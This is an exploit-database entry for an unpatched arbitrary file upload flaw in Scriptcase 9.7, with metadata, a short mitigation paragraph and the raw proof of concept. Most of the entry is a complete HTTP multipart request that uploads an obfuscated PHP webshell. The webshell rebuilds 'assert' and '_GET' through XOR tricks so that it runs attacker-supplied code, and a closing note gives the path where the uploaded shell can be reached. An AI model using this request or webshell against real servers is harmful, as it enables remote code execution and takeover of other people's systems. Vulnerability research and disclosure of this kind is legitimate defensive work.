Scriptcasr 9.7 arbitrary file upload getshell

vendor:

Scriptcase

by:

luckyt0mat0

7.5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: Scriptcase

Affected Version From: 9.7

Affected Version To: 9.7

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows Server 2019

2022

Scriptcasr 9.7 arbitrary file upload getshell

This exploit allows an attacker to upload arbitrary files to the target system using the vulnerable Scriptcase 9.7 software. By exploiting this vulnerability, an attacker can potentially upload a malicious PHP file and achieve remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update Scriptcase to a patched version that addresses this file upload vulnerability. Additionally, access controls should be implemented to restrict file uploads to trusted sources and validate file types and extensions.

Source

Exploit-DB raw data:

# Exploit Title: Scriptcasr 9.7 arbitrary file upload getshell
# Date: 2022-04-08
# Exploit Author: luckyt0mat0
# Vendor Homepage:  https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 9.7
# Tested on: Windows Server 2019

# Proof of Concept:

POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
Host: 10.50.1.214:8091
Content-Length: 570
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Origin: http://10.50.1.214:8091
Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
Connection: close

------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="jqul_csrf_token"

gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="files[]"; filename="123.php"
Content-Type: text/html

<?php
error_reporting(0);
$a = rad2deg^(3).(2);
$b = asin^(2).(6);
$c = ceil^(1).(1);
$exp = $a.$b.$c; //assert
$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
$pi=$$pi; //$_GET
call_user_func($exp,$pi{0}($pi{1}));
?>
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ———

# Notes:
- PHPSESSID is  - be1281e8cde9348d284c3074c9bea53e
- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php